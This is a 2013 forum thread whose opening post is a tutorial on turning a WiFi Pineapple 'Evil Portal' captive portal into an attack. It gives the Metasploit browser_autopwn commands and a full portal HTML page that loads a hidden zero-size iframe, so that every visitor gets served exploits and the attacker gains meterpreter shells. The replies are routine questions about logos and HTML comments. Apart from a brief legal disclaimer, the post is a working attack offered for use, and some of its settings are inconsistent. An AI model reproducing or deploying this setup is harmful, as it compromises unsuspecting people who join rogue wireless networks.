newbi3 Posted September 8, 2013 Share Posted September 8, 2013 Running a captive portal is a very useful thing on the pineapple and since everyone has to view it I thought why not use it to run an attack and get a shell? So here is a quick tutorial on using evil portal to deliver a meterpreter shell. You will need a pineapple running v3.x of the firmware with evil portal installed on it as well as metasploit and a machine to test this on. Before we get started here I'd like to remind you to check the laws where you live this could be illegal and also I am not responsible for your actions you and only you are. Please only do this in an environment that you have permission to do so in! Ok so first this is first lets start up metasploit and use browser autopwn by running the following commands: root@box:~# msfconsole msf > use auxiliary/server/browser_autopwn Now that that is done lets go ahead and take a look at the options msf auxiliary(browser_autopwn) > show options Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The IP address to use for reverse-connect payloads SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) We need to set LHOST and SRVHOST to the address of our machine ON THE PINEAPPLE NETWORK. In my case it is 172.16.42.42 and if you ran the wp4.sh script yours should be too. Also just for less confusion set SRVPORT to 80 and URIPATH to / msf auxiliary(browser_autopwn) > set LHOST 172.16.42.1 LHOST => 172.16.42.1 msf auxiliary(browser_autopwn) > set SRVPORT 172.16.42.1 SRVPORT => 172.16.42.1 msf auxiliary(browser_autopwn) > set SRVPORT 80 SRVPORT => 80 msf auxiliary(browser_autopwn) > set URIPATH / URIPATH => / Ok now go ahead and run it with the "run" command. This will take a minute to start up fully. Once that has finished starting up we need to create an iframe to it in our captive portal. Under the "Edit Splash" tab in Evil Portal go ahead and add this line somewhere in the body and then save the file: <iframe src="http://172.16.42.42/" height="0px" width="0px" seamless></iframe> This creates the iframe to the server running browser autopwn which will be doing our dirty work for us. After you saved the changes open up a browser on your test machine (that is connected to the pineapple network) and visit any webpage and you should get stopped by the captive portal! Check over in your metasploit console to see if you got any sessions, I am not going to hold your hand for this part because this is not a tutorial on how to use meterpreter. I hope this works for you and if you do anything cool post it here I'd love to see what the community does! Remember hack responsibly! Here is a quick video I made showing this in action: If you are wanting to use my code for the captive portal here it is: <html> <head> <title>Public Access Portal</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"> <script type="text/javascript"> var delay = 2; // length of delay in seconds var count = 0; var Texts=new Array(); Texts[0]='<p style="font-size:10px;"><u>Terms Of Service</u></p><p style="font-size:10px;">You agree that Public Access is not respondsible for your actions on the internet or on this network.<br/>You agree that all of your communications will be monitored and recorded by Public Access</p>'; Texts[1]='<a href="$authtarget"><img src="$imagesdir/enter.png" width="71" height="49" border="0"alt="Click to enter" title="Click to enter"> </a>'; function changeText(){ document.getElementById('textRange').innerHTML=Texts[count]; count++; if(count==Texts.length){ window.clearTimeout (to); count=0; } else { var to = setTimeout("changeText()",delay*10000); } } </script> </head> <body bgcolor="#DDDDDD" text="#000000" onload="changeText();"> <table border="0" cellpadding="2" cellspacing="0" width="100%"></applet> <tr> <td align=center> <!--<h2>Public Access</h2> <h10><b><u>Providing fast wireless access to the masses.</u></b></h10>--> </td> </tr> <tr> <td align=center> <br/><br/><br/> <h1>You're almost there!</h1> <p>BY CONNECTING TO THE NETWORK YOU AGREE TO OUR TERMS OF SERVICE.</p> </td> </tr> <tr> <td align=center height="120"> <!-- A client is authenticated by requesting the page $authtarget. So, href to it here, with an img or link text the user can click on. Also, note that any images you reference must reside in the subdirectory that is the value of $imagesdir (default: "images"). --> <div id="textRange"></div> </td> </tr> </table> <iframe src="http://172.16.42.42/" height="0px" width="0px" seamless></iframe> </body> </html> Quote Link to comment Share on other sites More sharing options...
thesugarat Posted September 9, 2013 Share Posted September 9, 2013 Thanks for your code! Now I need to figure out how to incorporate some logo pics. Quote Link to comment Share on other sites More sharing options...
newbi3 Posted September 9, 2013 Author Share Posted September 9, 2013 Very simple, you can either put them in /etc/nodogsplash/images/ or in /www and reference it like <img src="172.16.42.1:8080/mylogo.png"/> Quote Link to comment Share on other sites More sharing options...
thesugarat Posted September 9, 2013 Share Posted September 9, 2013 Ok, I'll give that a shot... Do they need to be .png format? And how would I safely comment out the iframe hook line? I don't want to delete it but using the ## option before the line just gave me two pound symbols in my splash screen. Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted September 9, 2013 Share Posted September 9, 2013 If its in the PHP Code, use //, if its in HTML , add a <!-- infront of the code and a --> at the end of the code Quote Link to comment Share on other sites More sharing options...
newbi3 Posted September 10, 2013 Author Share Posted September 10, 2013 I haven't researched it to much yet but I am pretty sure the nodogsplash web server doesn't support PHP so you will only be writting HTML, CSS, and javascript. Quote Link to comment Share on other sites More sharing options...
thesugarat Posted September 11, 2013 Share Posted September 11, 2013 Thanks to both of you. It looked like HTML but I am not a code monkey. :) Quote Link to comment Share on other sites More sharing options...
BobH Posted June 11, 2014 Share Posted June 11, 2014 Can you post a link to the video, for some reason it no longer appears for me inline.. Quote Link to comment Share on other sites More sharing options...
Swamppifi Posted June 13, 2014 Share Posted June 13, 2014 Bobh You can find it on newbi3 youtube channel, the link is his post signiture. but the link to the video covering this post topic is at http://www.youtube.com/watch?v=gOQoOCinGKQ Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.